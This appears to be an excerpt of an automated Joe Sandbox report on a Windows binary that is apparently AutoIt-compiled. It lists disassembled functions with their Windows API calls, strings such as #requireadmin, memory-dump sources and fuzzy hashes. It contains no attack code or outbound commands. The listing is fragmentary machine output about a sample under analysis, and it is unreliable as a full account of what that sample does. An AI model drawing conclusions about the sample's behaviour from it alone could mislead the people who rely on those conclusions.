                                                                                                            Function 00DBC27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00DBC306
                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00DBC34C
                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00E21990,013E57E8), ref: 00DBC395
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 135850232-4108050209
                                                                                                            • Opcode ID: d3a1793d3431f11b800206a3b88361a56aa76cf80299aed5cb622c28415f6e7f
                                                                                                            • Instruction ID: dc1244f17176f1578f21f283a42f512db824ce1d81dec1185eec4fc4c635348a
                                                                                                            • Opcode Fuzzy Hash: d3a1793d3431f11b800206a3b88361a56aa76cf80299aed5cb622c28415f6e7f
                                                                                                            • Instruction Fuzzy Hash: 6A418D71214341DFD720DF24D884B9ABBE4FB85320F08961EE8A697391DB70A904CB72
                                                                                                            Function 00DE4416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00DECC08,00000000,?,?,?,?), ref: 00DE44AA
                                                                                                            • GetWindowLongW.USER32 ref: 00DE44C7
                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DE44D7
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$Long
                                                                                                            • String ID: SysTreeView32
                                                                                                            • API String ID: 847901565-1698111956
                                                                                                            • Opcode ID: c300e16237384c64bd52cd28b075ff719c617ec189b59583c80c76da671f8f5d
                                                                                                            • Instruction ID: 96f48165ad4522b79b081b16231a66be912674f2af9c5d0ef0aaa883539f1f01
                                                                                                            • Opcode Fuzzy Hash: c300e16237384c64bd52cd28b075ff719c617ec189b59583c80c76da671f8f5d
                                                                                                            • Instruction Fuzzy Hash: B9317C31210285AFDB21AE39DC45BEA77A9EB08334F244715F979A21E0D770EC559770
                                                                                                            Function 00DD304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00DD335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00DD3077,?,?), ref: 00DD3378
                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00DD307A
                                                                                                            • _wcslen.LIBCMT ref: 00DD309B
                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00DD3106
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                            • String ID: 255.255.255.255
                                                                                                            • API String ID: 946324512-2422070025
                                                                                                            • Opcode ID: b7272e3f1a150490c17338b61d71ba4428dc065a9bdce9c7db2d36eecdb73b18
                                                                                                            • Instruction ID: a072101d8c15f438f98c0a69b0601860d8008e263ed0fde2150dffffc3274222
                                                                                                            • Opcode Fuzzy Hash: b7272e3f1a150490c17338b61d71ba4428dc065a9bdce9c7db2d36eecdb73b18
                                                                                                            • Instruction Fuzzy Hash: DA31B539604306DFCB10DF68C986EA977E0EF54318F28805AE9159B392D771EE45C772
                                                                                                            Function 00DE4653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00DE4705
                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00DE4713
                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00DE471A
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                            • String ID: msctls_updown32
                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                            • Opcode ID: f392be99a82390cfa32056a16e551272ddb91bd7ed42500f89d7c4e9a7662a1f
                                                                                                            • Instruction ID: d2ca45ac6f95bdc6390f5394b42e3cfecb100a46349fce1a30093937638e706e
                                                                                                            • Opcode Fuzzy Hash: f392be99a82390cfa32056a16e551272ddb91bd7ed42500f89d7c4e9a7662a1f
                                                                                                            • Instruction Fuzzy Hash: 312151B5600244AFDB10EF65DCC1DA737ADEB5A364B040059F9049B351C730EC52CAB0
                                                                                                            Function 00DB95AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcslen
                                                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                            • API String ID: 176396367-2734436370
                                                                                                            • Opcode ID: 75357fa5922e86f117bf7345ab9d25610f89cedc780ffb32e6483a553a1cb349
                                                                                                            • Instruction ID: f71849f42c6602dc32a8b06a299be6d7a1c04baf265be4a410dd2957af51dd0e
                                                                                                            • Opcode Fuzzy Hash: 75357fa5922e86f117bf7345ab9d25610f89cedc780ffb32e6483a553a1cb349
                                                                                                            • Instruction Fuzzy Hash: 17213832144590E6C731AB259C22FFBF3D8DF51310F688026FA8B97041EB51DD45C2B5
                                                                                                            Function 00DE37B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00DE3840
                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00DE3850
                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00DE3876
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                            • String ID: Listbox
                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                            • Opcode ID: 6775a58db2521362da628c3b36b3054ebea8bb8b465f50ff16b7fc3d05d9727e
                                                                                                            • Instruction ID: 964039bd82c926fa1c282632de3cae50699b34f0970fb55feea296dd815b1af9
                                                                                                            • Opcode Fuzzy Hash: 6775a58db2521362da628c3b36b3054ebea8bb8b465f50ff16b7fc3d05d9727e
                                                                                                            • Instruction Fuzzy Hash: 7121B072610258BBEF21AF56CC85EBB376AEF89750F148124F9049B190C671DC5287B0
                                                                                                            Function 00DC49F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00DC4A08
                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00DC4A5C
                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,00DECC08), ref: 00DC4AD0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                            • String ID: %lu
                                                                                                            • API String ID: 2507767853-685833217
                                                                                                            • Opcode ID: 879f3a45fd1402599bfa9913ff398565823a11764d4cc14f68c855e1926faf42
                                                                                                            • Instruction ID: 8c4bf0888f3301cb2959e9203d712388ca4e83075a7ca6b147c0455064636338
                                                                                                            • Opcode Fuzzy Hash: 879f3a45fd1402599bfa9913ff398565823a11764d4cc14f68c855e1926faf42
                                                                                                            • Instruction Fuzzy Hash: DC310F75A00209AFDB10DF54C995EAABBF8EF05308F144099E905DB252D771ED46CB71
                                                                                                            Function 00DE41EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00DE424F
                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00DE4264
                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00DE4271
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: MessageSend
                                                                                                            • String ID: msctls_trackbar32
                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                            • Opcode ID: 0f57b04a401207579ebe7ef4aff0002ebc84143fab80f04e0133d25987c76446
                                                                                                            • Instruction ID: 4a9f3a86b7453b06195bae8776b9ebdcb825bbd68498f46328066533881dc610
                                                                                                            • Opcode Fuzzy Hash: 0f57b04a401207579ebe7ef4aff0002ebc84143fab80f04e0133d25987c76446
                                                                                                            • Instruction Fuzzy Hash: 96110631240388BEEF206F2ACC46FAB3BACEF95B64F010124FA55E60A0D271DC519B34
                                                                                                            Function 00DB2F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                              • Part of subcall function 00D56B57: _wcslen.LIBCMT ref: 00D56B6A
                                                                                                              • Part of subcall function 00DB2DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00DB2DC5
                                                                                                              • Part of subcall function 00DB2DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00DB2DD6
                                                                                                              • Part of subcall function 00DB2DA7: GetCurrentThreadId.KERNEL32 ref: 00DB2DDD
                                                                                                              • Part of subcall function 00DB2DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00DB2DE4
                                                                                                            • GetFocus.USER32 ref: 00DB2F78
                                                                                                              • Part of subcall function 00DB2DEE: GetParent.USER32(00000000), ref: 00DB2DF9
                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00DB2FC3
                                                                                                            • EnumChildWindows.USER32(?,00DB303B), ref: 00DB2FEB
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                            • String ID: %s%d
                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                            • Opcode ID: 14a557e369a5896c7ea77ba19bf7b47a49d427ae80011dedb9dde8c2f9831634
                                                                                                            • Instruction ID: 2ef3ebfcc08ab3952e51c6bc006e91a5fe79b3eca32a3ec0fd3545f280e8f349
                                                                                                            • Opcode Fuzzy Hash: 14a557e369a5896c7ea77ba19bf7b47a49d427ae80011dedb9dde8c2f9831634
                                                                                                            • Instruction Fuzzy Hash: 3511A272600205ABCF147F648CC5EFE376AEF94305F045079BD0A9B252EE74994A9B70
                                                                                                            Function 00DE5882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DE58C1
                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00DE58EE
                                                                                                            • DrawMenuBar.USER32(?), ref: 00DE58FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                            • String ID: 0
                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                            • Opcode ID: e6cc0572900cf7326b472152bc29f291112aa2eafc551efc2cdc04d812a8fd53
                                                                                                            • Instruction ID: 40421b8ff0652c859e914a152032de7221ff2c48c2b40abf576fbd776f24033a
                                                                                                            • Opcode Fuzzy Hash: e6cc0572900cf7326b472152bc29f291112aa2eafc551efc2cdc04d812a8fd53
                                                                                                            • Instruction Fuzzy Hash: 51016131500298EFDB11AF12EC44BEEBBB4FB453A4F148099F949DA252DB308A94DF31
                                                                                                            Function 00DB007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON
                                                                                                            Download Yara Rule
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID:
                                                                                                            • API String ID:
                                                                                                            • Opcode ID: e84291088a025ab63d40a52a5b8e9209de6de2ebd4ea2cb5e2f35c2e0a9023f9
                                                                                                            • Instruction ID: ecae26ce0acef3140cd72bfcd16e28b070e03a00f02ba021a00bbf178c6940cf
                                                                                                            • Opcode Fuzzy Hash: e84291088a025ab63d40a52a5b8e9209de6de2ebd4ea2cb5e2f35c2e0a9023f9
                                                                                                            • Instruction Fuzzy Hash: FFC12D75A00216EFDB14DF98C898EAEBBB5FF48704F148598E506EB251D731ED41CBA0
                                                                                                            Function 00DD342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Variant$ClearInitInitializeUninitialize
                                                                                                            • String ID:
                                                                                                            • API String ID: 1998397398-0
                                                                                                            • Opcode ID: b8d11b5021b2a138739462bb94e3a0880f88ff4d837601d988d8abe958d47244
                                                                                                            • Instruction ID: c53bbe74741b12f39c5e40ebc831c8367ab9eb6ae8f743f6ee25bb12deb86941
                                                                                                            • Opcode Fuzzy Hash: b8d11b5021b2a138739462bb94e3a0880f88ff4d837601d988d8abe958d47244
                                                                                                            • Instruction Fuzzy Hash: 99A1E6756047009FCB10DF28D585A2AB7E5EF88715F14885AFD8A9B362DB30ED05CBB2
                                                                                                            Function 00DB0436 Relevance: 6.2, APIs: 4, Instructions: 230COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB05F0
                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB0608
                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00DECC40,000000FF,?,00000000,00000800,00000000,?,00DEFC08,?), ref: 00DB062D
                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00DB064E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                            • String ID:
                                                                                                            • API String ID: 314563124-0
                                                                                                            • Opcode ID: bdacc627bd2c80cb08f2a9635b8b8419c42cfb729a9802d5ad2074242b7ca337
                                                                                                            • Instruction ID: 8b8ec4c68efc53ea624c569c4f35d2f1248decee570ee865975156408780bf20
                                                                                                            • Opcode Fuzzy Hash: bdacc627bd2c80cb08f2a9635b8b8419c42cfb729a9802d5ad2074242b7ca337
                                                                                                            • Instruction Fuzzy Hash: 8E810D75A00109EFCB04DF98C984EEEBBB9FF89315F244558E516EB250DB71AE06CB60
                                                                                                            Function 00D91391 Relevance: 6.2, APIs: 4, Instructions: 152COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _free
                                                                                                            • String ID:
                                                                                                            • API String ID: 269201875-0
                                                                                                            • Opcode ID: 97bc704b6d8ea5213be7bf69c32b1d26d9c22e6c35832688fe2f25e119fae065
                                                                                                            • Instruction ID: 2ac82759ac0d1a29c84e26124ec41f6bfe2b58e30fbb6bd4ece320224c29ccd7
                                                                                                            • Opcode Fuzzy Hash: 97bc704b6d8ea5213be7bf69c32b1d26d9c22e6c35832688fe2f25e119fae065
                                                                                                            • Instruction Fuzzy Hash: BD413B39A00212ABDF317BFD9C45ABE3AF5EF49370F294225F419D6292F63488419772
                                                                                                            Function 00DE6278 Relevance: 6.1, APIs: 4, Instructions: 138COMMON
                                                                                                            Download Yara Rule
                                                                                                            APIs
                                                                                                            • GetWindowRect.USER32(013EE730,?), ref: 00DE62E2
                                                                                                            • ScreenToClient.USER32(?,?), ref: 00DE6315
                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DE6382
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000000.00000002.1733600653.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true
                                                                                                            • Associated: 00000000.00000002.1733582728.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000DEC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733665585.0000000000E12000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733718023.0000000000E1C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                            • Associated: 00000000.00000002.1733738652.0000000000E24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_0_2_d50000_AHSlIDftf1.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 3880355969-0
                                                                                                            • Opcode ID: 6aff1c9dbd40aced2875db336e35629b5e97c4aa2eca8a28aa078f932a02c582
                                                                                                            • Instruction ID: 95018283d60788beae307a17646ff8a15a7bcdce2e7c56b0f841a8a7e22e8c8d
                                                                                                            • Opcode Fuzzy Hash: 6aff1c9dbd40aced2875db336e35629b5e97c4aa2eca8a28aa078f932a02c582
